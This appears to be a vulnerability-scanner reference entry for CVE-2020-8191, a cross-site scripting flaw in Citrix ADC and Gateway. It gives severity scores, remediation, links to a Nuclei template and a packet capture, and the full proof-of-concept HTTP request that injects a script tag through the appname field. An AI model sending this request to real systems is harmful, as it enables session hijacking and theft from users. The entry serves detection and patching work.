| Title | Citrix ADC/Gateway - Cross-Site Scripting |
|---|---|
| Author | dwisiswant0 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.91575 |
| CVE ID | CVE-2020-8191 |
| CWE ID | CWE-79 |
| Tags | cve cve2020 citrix xss vkev vuln |
Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.
POST /menu/stapp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.16
Connection: close
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
X-NITRO-USER: xpyZxwy6
Accept-Encoding: gzip
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-8191.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-8191.pcap
N/AN/A